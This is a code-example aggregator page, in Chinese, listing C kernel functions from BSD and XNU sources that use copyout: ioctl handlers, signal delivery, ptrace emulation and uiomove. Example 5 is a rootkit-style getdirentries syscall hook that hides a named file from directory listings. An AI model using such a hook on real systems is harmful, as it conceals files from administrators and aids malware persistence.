本文整理汇总了C++中copyout函数的典型用法代码示例。如果您正苦于以下问题:C++ copyout函数的具体用法?C++ copyout怎么用?C++ copyout使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了copyout函数的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的C++代码示例。
示例1: uhid_ioctl
/*
 * ioctl handler for the uhid (USB generic HID) fifo device.
 *
 * fifo   - usb_fifo whose softc carries the HID state
 * cmd    - ioctl command code
 * addr   - kernel copy of the ioctl argument
 * fflags - FREAD/FWRITE open mode, used for permission checks
 *
 * Returns 0 or an errno.  (The tail of this function is omitted in
 * the original listing.)
 */
static int
uhid_ioctl(struct usb_fifo *fifo, u_long cmd, void *addr,
    int fflags)
{
	struct uhid_softc *sc = usb_fifo_softc(fifo);
	struct usb_gen_descriptor *ugd;
	uint32_t size;
	int error = 0;
	uint8_t id;

	switch (cmd) {
	case USB_GET_REPORT_DESC:
		ugd = addr;
		/* Clamp the copy to the user-supplied buffer size. */
		if (sc->sc_repdesc_size > ugd->ugd_maxlen) {
			size = ugd->ugd_maxlen;
		} else {
			size = sc->sc_repdesc_size;
		}
		ugd->ugd_actlen = size;
		if (ugd->ugd_data == NULL)
			break;		/* descriptor length only */
		error = copyout(sc->sc_repdesc_ptr, ugd->ugd_data, size);
		break;

	case USB_SET_IMMED:
		if (!(fflags & FREAD)) {
			error = EPERM;
			break;
		}
		if (*(int *)addr) {
			/* do a test read */
			error = uhid_get_report(sc, UHID_INPUT_REPORT,
			    sc->sc_iid, NULL, NULL, sc->sc_isize);
			if (error) {
				break;
			}
			/* Flag changes are serialized by the softc mutex. */
			mtx_lock(&sc->sc_mtx);
			sc->sc_flags |= UHID_FLAG_IMMED;
			mtx_unlock(&sc->sc_mtx);
		} else {
			mtx_lock(&sc->sc_mtx);
			sc->sc_flags &= ~UHID_FLAG_IMMED;
			mtx_unlock(&sc->sc_mtx);
		}
		break;

	case USB_GET_REPORT:
		if (!(fflags & FREAD)) {
			error = EPERM;
			break;
		}
		ugd = addr;
		/* Select size and report id for the requested report type. */
		switch (ugd->ugd_report_type) {
		case UHID_INPUT_REPORT:
			size = sc->sc_isize;
			id = sc->sc_iid;
			break;
		case UHID_OUTPUT_REPORT:
			size = sc->sc_osize;
			id = sc->sc_oid;
			break;
		case UHID_FEATURE_REPORT:
			size = sc->sc_fsize;
			id = sc->sc_fid;
			break;
		default:
			return (EINVAL);
		}
		/*
		 * NOTE(review): the copyin() result is ignored, so a faulting
		 * user pointer silently leaves "id" unchanged -- confirm this
		 * is intentional.
		 */
		if (id != 0)
			copyin(ugd->ugd_data, &id, 1);
		error = uhid_get_report(sc, ugd->ugd_report_type, id,
		    NULL, ugd->ugd_data, imin(ugd->ugd_maxlen, size));
		break;

	case USB_SET_REPORT:
		if (!(fflags & FWRITE)) {
			error = EPERM;
			break;
		}
		ugd = addr;
		switch (ugd->ugd_report_type) {
		case UHID_INPUT_REPORT:
			size = sc->sc_isize;
			id = sc->sc_iid;
			break;
		case UHID_OUTPUT_REPORT:
			size = sc->sc_osize;
			id = sc->sc_oid;
			break;
		case UHID_FEATURE_REPORT:
			size = sc->sc_fsize;
			id = sc->sc_fid;
			break;
		default:
			return (EINVAL);
		}
		/* See the NOTE(review) above: copyin() result unchecked. */
		if (id != 0)
			copyin(ugd->ugd_data, &id, 1);
//......... remainder omitted in the original listing .........
示例2: mach_msg_receive_results
/*
 * Complete a Mach message receive for the current thread.
 *
 * Consumes the receive state the blocking receive path stashed in the
 * thread's ith_* fields, drops the reference on the waited-on object,
 * and either reports the receive error back to user space or copies
 * the received kernel message (plus trailer) out to ith_msg_addr.
 *
 * Returns the final mach_msg_return_t for the receive.
 */
mach_msg_return_t
mach_msg_receive_results(void)
{
	thread_t self = current_thread();
	ipc_space_t space = current_space();
	vm_map_t map = current_map();

	/* Receive state saved on the thread by the receive path. */
	ipc_object_t object = self->ith_object;
	mach_msg_return_t mr = self->ith_state;
	mach_vm_address_t msg_addr = self->ith_msg_addr;
	mach_msg_option_t option = self->ith_option;
	ipc_kmsg_t kmsg = self->ith_kmsg;
	mach_port_seqno_t seqno = self->ith_seqno;
	mach_msg_trailer_size_t trailer_size;

	/* Drop the reference taken on the port/set we received on. */
	io_release(object);

	if (mr != MACH_MSG_SUCCESS) {
		if (mr == MACH_RCV_TOO_LARGE ) {
			if (option & MACH_RCV_LARGE) {
				/*
				 * We need to inform the user-level code that it needs more
				 * space. The value for how much space was returned in the
				 * msize save area instead of the message (which was left on
				 * the queue).
				 */
				if (option & MACH_RCV_LARGE_IDENTITY) {
					if (copyout((char *) &self->ith_receiver_name,
					    msg_addr + offsetof(mach_msg_user_header_t, msgh_local_port),
					    sizeof(mach_port_name_t)))
						mr = MACH_RCV_INVALID_DATA;
				}
				if (copyout((char *) &self->ith_msize,
				    msg_addr + offsetof(mach_msg_user_header_t, msgh_size),
				    sizeof(mach_msg_size_t)))
					mr = MACH_RCV_INVALID_DATA;
			} else {
				/* discard importance in message */
				ipc_importance_clean(kmsg);
				if (msg_receive_error(kmsg, msg_addr, option, seqno, space)
				    == MACH_RCV_INVALID_DATA)
					mr = MACH_RCV_INVALID_DATA;
			}
		}
		return mr;
	}

#if IMPORTANCE_INHERITANCE
	/* adopt/transform any importance attributes carried in the message */
	ipc_importance_receive(kmsg, option);
#endif /* IMPORTANCE_INHERITANCE */

	/* Append the requested trailer before copying out to user space. */
	trailer_size = ipc_kmsg_add_trailer(kmsg, space, option, self, seqno, FALSE,
	    kmsg->ikm_header->msgh_remote_port->ip_context);

	mr = ipc_kmsg_copyout(kmsg, space, map, MACH_MSG_BODY_NULL, option);
	if (mr != MACH_MSG_SUCCESS) {
		/* already received importance, so have to undo that here */
		ipc_importance_unreceive(kmsg, option);

		if ((mr &~ MACH_MSG_MASK) == MACH_RCV_BODY_ERROR) {
			/* Body copyout failed; still deliver header+trailer. */
			if (ipc_kmsg_put(msg_addr, kmsg, kmsg->ikm_header->msgh_size +
			    trailer_size) == MACH_RCV_INVALID_DATA)
				mr = MACH_RCV_INVALID_DATA;
		}
		else {
			if (msg_receive_error(kmsg, msg_addr, option, seqno, space)
			    == MACH_RCV_INVALID_DATA)
				mr = MACH_RCV_INVALID_DATA;
		}
	} else {
		mr = ipc_kmsg_put(msg_addr,
		    kmsg,
		    kmsg->ikm_header->msgh_size +
		    trailer_size);
	}
	return mr;
}
示例3: sendsig
/*
 * Deliver a signal to the current process: build a signal frame on the
 * user stack (or the alternate signal stack), copy it out, and point
 * the trapframe at the user handler so it runs on return to user mode.
 *
 * catcher - user-mode signal handler address
 * ksi     - signal info (number, code, siginfo payload)
 * mask    - signal mask to be restored by sigreturn
 *
 * Called with the proc lock and ps_mtx held; both are dropped around
 * the copyout and re-acquired before returning.
 */
void
sendsig(sig_t catcher, ksiginfo_t *ksi, sigset_t *mask)
{
	struct sigframe *fp, frame;
	struct sysentvec *sysent;
	struct trapframe *tf;
	struct sigacts *psp;
	struct thread *td;
	struct proc *p;
	int onstack;
	int code;
	int sig;

	td = curthread;
	p = td->td_proc;
	PROC_LOCK_ASSERT(p, MA_OWNED);

	sig = ksi->ksi_signo;
	code = ksi->ksi_code;
	psp = p->p_sigacts;
	mtx_assert(&psp->ps_mtx, MA_OWNED);

	tf = td->td_frame;
	onstack = sigonstack(tf->tf_sp);

	CTR4(KTR_SIG, "sendsig: td=%p (%s) catcher=%p sig=%d", td, p->p_comm,
	    catcher, sig);

	/* Allocate and validate space for the signal handler context. */
	if ((td->td_pflags & TDP_ALTSTACK) != 0 && !onstack &&
	    SIGISMEMBER(psp->ps_sigonstack, sig)) {
		fp = (struct sigframe *)((uintptr_t)td->td_sigstk.ss_sp +
		    td->td_sigstk.ss_size);
	} else {
		fp = (struct sigframe *)td->td_frame->tf_sp;
	}

	/* Make room, keeping the stack aligned */
	fp--;
	fp = (struct sigframe *)STACKALIGN(fp);

	/*
	 * Fill in the frame to copy out.  Zero it first so that no
	 * uninitialized kernel stack bytes (e.g. structure padding)
	 * leak to user space through the copyout below.
	 */
	bzero(&frame, sizeof(frame));
	get_mcontext(td, &frame.sf_uc.uc_mcontext, 0);
	get_fpcontext(td, &frame.sf_uc.uc_mcontext);
	frame.sf_si = ksi->ksi_info;
	frame.sf_uc.uc_sigmask = *mask;
	/*
	 * Copy the whole sigaltstack state first, then override ss_flags.
	 * (The original did these two in the opposite order, letting the
	 * struct copy clobber the flags that had just been computed.)
	 */
	frame.sf_uc.uc_stack = td->td_sigstk;
	frame.sf_uc.uc_stack.ss_flags = (td->td_pflags & TDP_ALTSTACK) ?
	    ((onstack) ? SS_ONSTACK : 0) : SS_DISABLE;
	mtx_unlock(&psp->ps_mtx);
	PROC_UNLOCK(td->td_proc);

	/* Copy the sigframe out to the user's stack. */
	if (copyout(&frame, fp, sizeof(*fp)) != 0) {
		/* Process has trashed its stack. Kill it. */
		CTR2(KTR_SIG, "sendsig: sigexit td=%p fp=%p", td, fp);
		PROC_LOCK(p);
		sigexit(td, SIGILL);
	}

	/* Handler arguments: (signo, siginfo *, ucontext *). */
	tf->tf_a[0] = sig;
	tf->tf_a[1] = (register_t)&fp->sf_si;
	tf->tf_a[2] = (register_t)&fp->sf_uc;
	tf->tf_sepc = (register_t)catcher;
	tf->tf_sp = (register_t)fp;

	/* Return address: shared-page sigcode if present, else legacy copy. */
	sysent = p->p_sysent;
	if (sysent->sv_sigcode_base != 0)
		tf->tf_ra = (register_t)sysent->sv_sigcode_base;
	else
		tf->tf_ra = (register_t)(sysent->sv_psstrings -
		    *(sysent->sv_szsigcode));

	CTR3(KTR_SIG, "sendsig: return td=%p pc=%#x sp=%#x", td, tf->tf_sepc,
	    tf->tf_sp);

	PROC_LOCK(p);
	mtx_lock(&psp->ps_mtx);
}
示例4: netbsd32_sendsig_siginfo
/*
 * Deliver a signal to a 32-bit (netbsd32 compat) process on sparc64.
 *
 * Builds a sparc32 siginfo-style signal frame, copies the siginfo and
 * ucontext out to the user stack, links a new register window so the
 * handler's frame chains onto the interrupted one, and rewrites the
 * trapframe so execution resumes in the signal trampoline/handler.
 */
static void
netbsd32_sendsig_siginfo(const ksiginfo_t *ksi, const sigset_t *mask)
{
	struct lwp *l = curlwp;
	struct proc *p = l->l_proc;
	struct sigacts *ps = p->p_sigacts;
	int onstack;
	int sig = ksi->ksi_signo;
	ucontext32_t uc;
	struct sparc32_sigframe_siginfo *fp;
	netbsd32_intptr_t catcher;
	struct trapframe64 *tf = l->l_md.md_tf;
	struct rwindow32 *oldsp, *newsp;
	int ucsz, error;

	/* Need to attempt to zero extend this 32-bit pointer */
	oldsp = (struct rwindow32*)(u_long)(u_int)tf->tf_out[6];

	/* Do we need to jump onto the signal stack? */
	onstack =
	    (l->l_sigstk.ss_flags & (SS_DISABLE | SS_ONSTACK)) == 0 &&
	    (SIGACTION(p, sig).sa_flags & SA_ONSTACK) != 0;

	/* Allocate space for the signal handler context. */
	if (onstack)
		fp = (struct sparc32_sigframe_siginfo *)
		    ((char *)l->l_sigstk.ss_sp +
		    l->l_sigstk.ss_size);
	else
		fp = (struct sparc32_sigframe_siginfo *)oldsp;
	/* 8-byte align the frame pointer below the allocated slot. */
	fp = (struct sparc32_sigframe_siginfo*)((u_long)(fp - 1) & ~7);

	/*
	 * Build the signal context to be used by sigreturn.
	 */
	uc.uc_flags = _UC_SIGMASK |
	    ((l->l_sigstk.ss_flags & SS_ONSTACK)
	    ? _UC_SETSTACK : _UC_CLRSTACK);
	uc.uc_sigmask = *mask;
	uc.uc_link = (uint32_t)(uintptr_t)l->l_ctxlink;
	memset(&uc.uc_stack, 0, sizeof(uc.uc_stack));
	sendsig_reset(l, sig);

	/*
	 * Now copy the stack contents out to user space.
	 * We need to make sure that when we start the signal handler,
	 * its %i6 (%fp), which is loaded from the newly allocated stack area,
	 * joins seamlessly with the frame it was in when the signal occurred,
	 * so that the debugger and _longjmp code can back up through it.
	 * Since we're calling the handler directly, allocate a full size
	 * C stack frame.
	 */
	mutex_exit(p->p_lock);
	cpu_getmcontext32(l, &uc.uc_mcontext, &uc.uc_flags);
	/* Only copy out the part of the ucontext up to the padding. */
	ucsz = (int)(intptr_t)&uc.__uc_pad - (int)(intptr_t)&uc;
	newsp = (struct rwindow32*)((intptr_t)fp - sizeof(struct frame32));
	error = (copyout(&ksi->ksi_info, &fp->sf_si, sizeof ksi->ksi_info) ||
	    copyout(&uc, &fp->sf_uc, ucsz) ||
	    suword(&newsp->rw_in[6], (intptr_t)oldsp));
	mutex_enter(p->p_lock);

	if (error) {
		/*
		 * Process has trashed its stack; give it an illegal
		 * instruction to halt it in its tracks.
		 */
		sigexit(l, SIGILL);
		/* NOTREACHED */
	}

	switch (ps->sa_sigdesc[sig].sd_vers) {
	default:
		/* Unsupported trampoline version; kill the process. */
		sigexit(l, SIGILL);
	case 2:
		/*
		 * Arrange to continue execution at the user's handler.
		 * It needs a new stack pointer, a return address and
		 * three arguments: (signo, siginfo *, ucontext *).
		 */
		catcher = (intptr_t)SIGACTION(p, sig).sa_handler;
		tf->tf_pc = catcher;
		tf->tf_npc = catcher + 4;
		tf->tf_out[0] = sig;
		tf->tf_out[1] = (intptr_t)&fp->sf_si;
		tf->tf_out[2] = (intptr_t)&fp->sf_uc;
		tf->tf_out[6] = (intptr_t)newsp;
		/* %o7 = trampoline - 8 so its "ret" lands on the trampoline. */
		tf->tf_out[7] = (intptr_t)ps->sa_sigdesc[sig].sd_tramp - 8;
		break;
	}

	/* Remember that we're now on the signal stack. */
	if (onstack)
		l->l_sigstk.ss_flags |= SS_ONSTACK;
}
示例5: getdirentries_hook
/*
* getdirentries system call hook.
* Hides the file T_NAME.
*/
static int
getdirentries_hook(struct thread *td, void *syscall_args)
{
struct getdirentries_args /* {
int fd;
char *buf;
u_int count;
long *basep;
} */ *uap;
uap = (struct getdirentries_args *)syscall_args;
struct dirent *dp, *current;
unsigned int size, count;
/*
* Store the directory entries found in fd in buf, and record the
* number of bytes actually transferred.
*/
getdirentries(td, syscall_args);
size = td->td_retval[0];
/* Does fd actually contain any directory entries? */
if (size > 0) {
MALLOC(dp, struct dirent *, size, M_TEMP, M_NOWAIT);
copyin(uap->buf, dp, size);
current = dp;
count = size;
/*
* Iterate through the directory entries found in fd.
* Note: The last directory entry always has a record length
* of zero.
*/
while ((current->d_reclen != 0) && (count > 0)) {
count -= current->d_reclen;
/* Do we want to hide this file? */
if(strcmp((char *)&(current->d_name), T_NAME) == 0)
{
/*
* Copy every directory entry found after
* T_NAME over T_NAME, effectively cutting it
* out.
*/
if (count != 0)
bcopy((char *)current +
current->d_reclen, current,
count);
size -= current->d_reclen;
break;
}
/*
* Are there still more directory entries to
* look through?
*/
if (count != 0)
/* Advance to the next record. */
current = (struct dirent *)((char *)current +
current->d_reclen);
}
/*
* If T_NAME was found in fd, adjust the "return values" to
* hide it. If T_NAME wasn't found...don't worry 'bout it.
*/
td->td_retval[0] = size;
copyout(dp, uap->buf, size);
FREE(dp, M_TEMP);
}
return(0);
}
示例6: statis_upd
/*
 * Copy the in-kernel statistics table out to the user buffer at
 * "adr" and report the number of valid entries.
 *
 * The copyout() result is deliberately discarded; callers only
 * learn the entry count.
 */
int
statis_upd(caddr_t adr)
{
	size_t nbytes;

	nbytes = sizeof (struct statis) * sind;
	(void) copyout(statis, adr, nbytes);
	return (sind);
}
示例7: load_coff_section
/*
 * Map one section of a COFF executable into a process address space.
 *
 * vmspace - target process VM space
 * vp      - vnode of the executable
 * offset  - file offset of the section data
 * vmaddr  - target virtual address of the section
 * memsz   - in-memory size (may exceed filsz for BSS-style zero fill)
 * filsz   - on-disk size of the section
 * prot    - protection for the mapped pages
 *
 * Returns 0 on success or an errno / vm error converted to errno.
 */
static int
load_coff_section(struct vmspace *vmspace, struct vnode *vp, vm_offset_t offset,
    caddr_t vmaddr, size_t memsz, size_t filsz, vm_prot_t prot)
{
	size_t map_len;
	vm_offset_t map_offset;
	vm_offset_t map_addr;
	int error;
	unsigned char *data_buf = 0;
	size_t copy_len;

	/* Round the file mapping down to page boundaries. */
	map_offset = trunc_page(offset);
	map_addr = trunc_page((vm_offset_t)vmaddr);

	if (memsz > filsz) {
		/*
		 * We have the stupid situation that
		 * the section is longer than it is on file,
		 * which means it has zero-filled areas, and
		 * we have to work for it. Stupid iBCS!
		 */
		map_len = trunc_page(offset + filsz) - trunc_page(map_offset);
	} else {
		/*
		 * The only stuff we care about is on disk, and we
		 * don't care if we map in more than is really there.
		 */
		map_len = round_page(offset + filsz) - trunc_page(map_offset);
	}

	DPRINTF(("%s(%d): vm_mmap(&vmspace->vm_map, &0x%08jx, 0x%x, 0x%x, "
	    "VM_PROT_ALL, MAP_PRIVATE | MAP_FIXED, OBJT_VNODE, vp, 0x%x)\n",
	    __FILE__, __LINE__, (uintmax_t)map_addr, map_len, prot,
	    map_offset));

	/* Map the page-aligned portion of the section directly from the file. */
	if ((error = vm_mmap(&vmspace->vm_map,
	    &map_addr,
	    map_len,
	    prot,
	    VM_PROT_ALL,
	    MAP_PRIVATE | MAP_FIXED,
	    OBJT_VNODE,
	    vp,
	    map_offset)) != 0)
		return error;

	if (memsz == filsz) {
		/* We're done! */
		return 0;
	}

	/*
	 * Now we have screwball stuff, to accomodate stupid COFF.
	 * We have to map the remaining bit of the file into the kernel's
	 * memory map, allocate some anonymous memory, copy that last
	 * bit into it, and then we're done. *sigh*
	 * For clean-up reasons, we actally map in the file last.
	 */
	copy_len = (offset + filsz) - trunc_page(offset + filsz);
	map_addr = trunc_page((vm_offset_t)vmaddr + filsz);
	map_len = round_page((vm_offset_t)vmaddr + memsz) - map_addr;

	DPRINTF(("%s(%d): vm_map_find(&vmspace->vm_map, NULL, 0, &0x%08jx,0x%x, VMFS_NO_SPACE, VM_PROT_ALL, VM_PROT_ALL, 0)\n", __FILE__, __LINE__, (uintmax_t)map_addr, map_len));

	/* Allocate anonymous (zero-filled) pages for the tail of the section. */
	if (map_len != 0) {
		error = vm_map_find(&vmspace->vm_map, NULL, 0, &map_addr,
		    map_len, VMFS_NO_SPACE, VM_PROT_ALL, VM_PROT_ALL, 0);
		if (error)
			return (vm_mmap_to_errno(error));
	}

	/* Map the last partial file page into the kernel to copy it out. */
	if ((error = vm_mmap(exec_map,
	    (vm_offset_t *) &data_buf,
	    PAGE_SIZE,
	    VM_PROT_READ,
	    VM_PROT_READ,
	    0,
	    OBJT_VNODE,
	    vp,
	    trunc_page(offset + filsz))) != 0)
		return error;

	error = copyout(data_buf, (caddr_t) map_addr, copy_len);

	/* Always unmap the temporary kernel mapping, even on copy failure. */
	if (vm_map_remove(exec_map,
	    (vm_offset_t) data_buf,
	    (vm_offset_t) data_buf + PAGE_SIZE))
		panic("load_coff_section vm_map_remove failed");

	return error;
}
示例8: tws_passthru
/*
 * Execute a user-supplied passthrough command on the 3ware controller.
 *
 * buf points at a kernel copy of a tws_ioctl_no_data_buf describing the
 * command packet and an optional user data buffer.  Acquires a
 * passthrough request slot (sleeping until one is free), stages the
 * user data, submits the command, waits for completion, and copies the
 * results (and any data) back out.  Returns 0 or an errno.
 */
static int
tws_passthru(struct tws_softc *sc, void *buf)
{
	struct tws_request *req;
	struct tws_ioctl_no_data_buf *ubuf = (struct tws_ioctl_no_data_buf *)buf;
	int error;
	u_int16_t lun4;

	/* Refuse new passthrough commands while the controller is resetting. */
	if ( tws_get_state(sc) == TWS_RESET ) {
		return(EBUSY);
	}

	/* Wait for a free passthrough request slot. */
	do {
		req = tws_get_request(sc, TWS_PASSTHRU_REQ);
		if ( !req ) {
			/* sc->chan is the wakeup channel signalled on free. */
			sc->chan = 1;
			error = tsleep((void *)&sc->chan, 0,
			    "tws_sleep", TWS_IO_TIMEOUT*hz);
			if ( error == EWOULDBLOCK ) {
				return(ETIMEDOUT);
			}
		} else {
			break;
		}
	}while(1);

	req->length = ubuf->driver_pkt.buffer_length;
	TWS_TRACE_DEBUG(sc, "datal,rid", req->length, req->request_id);
	if ( req->length ) {
		req->data = kmalloc(req->length, M_TWS, M_WAITOK | M_ZERO);
		/*
		 * NOTE(review): the copyin() result is ignored here; a
		 * faulting user pointer would submit a zeroed buffer.
		 * Confirm whether that is intentional.
		 */
		error = copyin(ubuf->pdata, req->data, req->length);
	}
	req->flags = TWS_DIR_IN | TWS_DIR_OUT;
	req->cb = tws_passthru_complete;

	/* Stage the user's command packet into the request. */
	memcpy(&req->cmd_pkt->cmd, &ubuf->cmd_pkt.cmd,
	    sizeof(struct tws_command_apache));

	/* Patch the request id into the appropriate packet field. */
	if ( GET_OPCODE(req->cmd_pkt->cmd.pkt_a.res__opcode) ==
	    TWS_FW_CMD_EXECUTE_SCSI ) {
		lun4 = req->cmd_pkt->cmd.pkt_a.lun_l4__req_id & 0xF000;
		req->cmd_pkt->cmd.pkt_a.lun_l4__req_id = lun4 | req->request_id;
	} else {
		req->cmd_pkt->cmd.pkt_g.generic.request_id = (u_int8_t) req->request_id;
	}

	/* Submit under the general lock and sleep until completion. */
	lockmgr(&sc->gen_lock, LK_EXCLUSIVE);
	req->error_code = tws_map_request(sc, req);
	error = lksleep(req, &sc->gen_lock, 0, "tws_passthru", TWS_IO_TIMEOUT*hz);
	if ( error == EWOULDBLOCK ) {
		error = ETIMEDOUT;
		TWS_TRACE_DEBUG(sc, "lksleep timeout", error, req->request_id);
		tws_reset((void *)sc);
	}

	if ( req->error_code == TWS_REQ_REQUEUE ) {
		error = EBUSY;
	}
	tws_unmap_request(sc, req);

	/* Copy results (header, command, optional data) back to the user. */
	memcpy(&ubuf->cmd_pkt.hdr, &req->cmd_pkt->hdr, sizeof(struct tws_command_apache));
	memcpy(&ubuf->cmd_pkt.cmd, &req->cmd_pkt->cmd, sizeof(struct tws_command_apache));
	if ( !error && req->length ) {
		error = copyout(req->data, ubuf->pdata, req->length);
	}
	/*
	 * NOTE(review): req->data is freed unconditionally; this assumes the
	 * request slot zeroes/initializes data when length == 0 -- confirm.
	 */
	kfree(req->data, M_TWS);
	req->state = TWS_REQ_STATE_FREE;
	lockmgr(&sc->gen_lock, LK_RELEASE);

	if ( error )
		TWS_TRACE_DEBUG(sc, "errored", error, 0);
	if ( req->error_code != TWS_REQ_SUBMIT_SUCCESS )
		ubuf->driver_pkt.os_status = error;

	/* Wake any thread waiting for a free passthrough slot. */
	if ( sc->chan && tws_get_state(sc) != TWS_RESET ) {
		sc->chan = 0;
		wakeup((void *)&sc->chan);
	}
	return(error);
}
示例9: linux_ptrace
/*
 * Linux ptrace(2) emulation: translate Linux PTRACE_* requests and
 * register layouts into the native FreeBSD kern_ptrace() interface.
 *
 * Returns 0 or an errno.  (The tail of this function is omitted in
 * the original listing.)
 */
int
linux_ptrace(struct thread *td, struct linux_ptrace_args *uap)
{
	/* Linux-layout register buffers, converted to/from native below. */
	union {
		struct linux_pt_reg reg;
		struct linux_pt_fpreg fpreg;
		struct linux_pt_fpxreg fpxreg;
	} r;
	/* Native FreeBSD register buffers. */
	union {
		struct reg bsd_reg;
		struct fpreg bsd_fpreg;
		struct dbreg bsd_dbreg;
	} u;
	void *addr;
	pid_t pid;
	int error, req;

	error = 0;

	/* by default, just copy data intact */
	req = uap->req;
	pid = (pid_t)uap->pid;
	addr = (void *)uap->addr;

	switch (req) {
	case PTRACE_TRACEME:
	case PTRACE_POKETEXT:
	case PTRACE_POKEDATA:
	case PTRACE_KILL:
		/* Request numbers match; pass straight through. */
		error = kern_ptrace(td, req, pid, addr, uap->data);
		break;
	case PTRACE_PEEKTEXT:
	case PTRACE_PEEKDATA: {
		/* need to preserve return value */
		int rval = td->td_retval[0];
		error = kern_ptrace(td, req, pid, addr, 0);
		if (error == 0)
			/* Linux returns the peeked word via *data. */
			error = copyout(td->td_retval, (void *)uap->data,
			    sizeof(l_int));
		td->td_retval[0] = rval;
		break;
	}
	case PTRACE_DETACH:
		error = kern_ptrace(td, PT_DETACH, pid, (void *)1,
		    map_signum(uap->data));
		break;
	case PTRACE_SINGLESTEP:
	case PTRACE_CONT:
		error = kern_ptrace(td, req, pid, (void *)1,
		    map_signum(uap->data));
		break;
	case PTRACE_ATTACH:
		error = kern_ptrace(td, PT_ATTACH, pid, addr, uap->data);
		break;
	case PTRACE_GETREGS:
		/* Linux is using data where FreeBSD is using addr */
		error = kern_ptrace(td, PT_GETREGS, pid, &u.bsd_reg, 0);
		if (error == 0) {
			map_regs_to_linux(&u.bsd_reg, &r.reg);
			error = copyout(&r.reg, (void *)uap->data,
			    sizeof(r.reg));
		}
		break;
	case PTRACE_SETREGS:
		/* Linux is using data where FreeBSD is using addr */
		error = copyin((void *)uap->data, &r.reg, sizeof(r.reg));
		if (error == 0) {
			map_regs_from_linux(&u.bsd_reg, &r.reg);
			error = kern_ptrace(td, PT_SETREGS, pid, &u.bsd_reg, 0);
		}
		break;
	case PTRACE_GETFPREGS:
		/* Linux is using data where FreeBSD is using addr */
		error = kern_ptrace(td, PT_GETFPREGS, pid, &u.bsd_fpreg, 0);
		if (error == 0) {
			map_fpregs_to_linux(&u.bsd_fpreg, &r.fpreg);
			error = copyout(&r.fpreg, (void *)uap->data,
			    sizeof(r.fpreg));
		}
		break;
	case PTRACE_SETFPREGS:
		/* Linux is using data where FreeBSD is using addr */
		error = copyin((void *)uap->data, &r.fpreg, sizeof(r.fpreg));
		if (error == 0) {
			map_fpregs_from_linux(&u.bsd_fpreg, &r.fpreg);
			error = kern_ptrace(td, PT_SETFPREGS, pid,
			    &u.bsd_fpreg, 0);
		}
		break;
	case PTRACE_SETFPXREGS:
		error = copyin((void *)uap->data, &r.fpxreg, sizeof(r.fpxreg));
		if (error)
			break;
		/* FALL THROUGH */
	case PTRACE_GETFPXREGS: {
		struct proc *p;
		struct thread *td2;

		if (sizeof(struct linux_pt_fpxreg) != sizeof(struct savexmm)) {
			static int once = 0;
//......... remainder omitted in the original listing .........
示例10: anp_ioctl
//......... beginning of function omitted in the original listing .........
}
#endif
	/*
	 * Interpret high order word to find amount of data to be
	 * copied to/from the user's address space.
	 */
	size = IOCPARM_LEN(com);
	if (size > IOCPARM_MAX) {
		anp_errno=ENOTTY;
		MU_UNLOCK(kern_lock_p);
		return -1;
	}
	memp = NULL;
	/* Use the heap only when the argument exceeds the stack buffer. */
	if (size > sizeof (stkbuf)) {
		memp = (caddr_t)anp_sys_malloc((u_long)size, M_IOCTLOPS, M_WAITOK);
		data = memp;
	} else
		data = stkbuf;
	if (com&IOC_IN) {
		if (size) {
			/* Copy the input argument in from user space. */
			error = copyin(udata, data, (u_int)size);
			if (error) {
				if (memp)
					anp_sys_free(memp, M_IOCTLOPS);
				anp_errno=error;
				MU_UNLOCK(kern_lock_p);
				return -1;
			}
		} else
			*(caddr_t *)data = udata;
	} else if ((com&IOC_OUT) && size)
		/*
		 * Zero the buffer so the user always
		 * gets back something deterministic.
		 */
		bzero(data, size);
	else if (com&IOC_VOID)
		*(caddr_t *)data = udata;

	switch (com) {

	case FIONBIO:
	case FIOASYNC:
		tmp = *((int *) data);
		error = (soo_ioctl)(sock, com, (caddr_t)&tmp);
		break;
#ifdef NOPE
	case FIOSETOWN:
		tmp = *((int *)data);
		if (fp->f_type == DTYPE_SOCKET) {
			((struct socket *)fp->f_data)->so_pgid = tmp;
			error = 0;
			break;
		}
		if (tmp <= 0) {
			tmp = -tmp;
		} else {
			struct proc *p1 = pfind(tmp);
			if (p1 == 0) {
				error = ESRCH;
				break;
			}
			tmp = p1->p_pgrp->pg_id;
		}
		error = (*fp->f_ops->fo_ioctl)
		    (fp, (int)TIOCSPGRP, (caddr_t)&tmp, p);
		break;

	case FIOGETOWN:
		if (fp->f_type == DTYPE_SOCKET) {
			error = 0;
			*(int *)data = ((struct socket *)fp->f_data)->so_pgid;
			break;
		}
		error = (*fp->f_ops->fo_ioctl)(fp, (int)TIOCGPGRP, data, p);
		*(int *)data = -*(int *)data;
		break;
#endif

	default:
		error = soo_ioctl(sock, com, data);
		/*
		 * Copy any data to user, size was
		 * already set and checked above.
		 */
		if (error == 0 && (com&IOC_OUT) && size)
			error = copyout(data, udata, (u_int)size);
		break;
	}
	if (memp)
		anp_sys_free(memp, M_IOCTLOPS);
	/* Report errors via anp_errno with a -1 return, Unix-syscall style. */
	anp_errno=error;
	MU_UNLOCK(kern_lock_p);
	if (anp_errno!=0) {
		return -1;
	} else {
		return 0;
	}
}
示例11: uiomove
/*
 * Move up to n bytes between the kernel buffer ptr and the scatter/
 * gather region described by uio.
 *
 * The transfer direction follows uio_rw: UIO_READ moves kernel data
 * out to the uio buffers, UIO_WRITE moves uio data into ptr.  The
 * iovec pointers/lengths, uio_resid and uio_offset are advanced as
 * data is moved.  Returns 0 on success or the copyin/copyout error.
 */
int
uiomove(void *ptr, size_t n, struct uio *uio)
{
	struct iovec *iov;
	size_t chunk;
	int result;

	if (uio->uio_rw != UIO_READ && uio->uio_rw != UIO_WRITE) {
		panic("uiomove: Invalid uio_rw %d\n", (int) uio->uio_rw);
	}

	/* Sanity: kernel-space transfers carry no address space. */
	if (uio->uio_segflg==UIO_SYSSPACE) {
		KASSERT(uio->uio_space == NULL);
	}
	else {
		KASSERT(uio->uio_space == curthread->t_addrspace);
	}

	while (n > 0 && uio->uio_resid > 0) {
		/* Work on the current (first) iovec. */
		iov = uio->uio_iov;
		chunk = iov->iov_len;
		if (chunk > n) {
			chunk = n;
		}

		if (chunk == 0) {
			/* This iovec is exhausted; step to the next one. */
			uio->uio_iov++;
			uio->uio_iovcnt--;
			if (uio->uio_iovcnt == 0) {
				/*
				 * This should only happen if you set
				 * uio_resid incorrectly (to more than
				 * the total length of buffers the uio
				 * points to).
				 */
				panic("uiomove: ran out of buffers\n");
			}
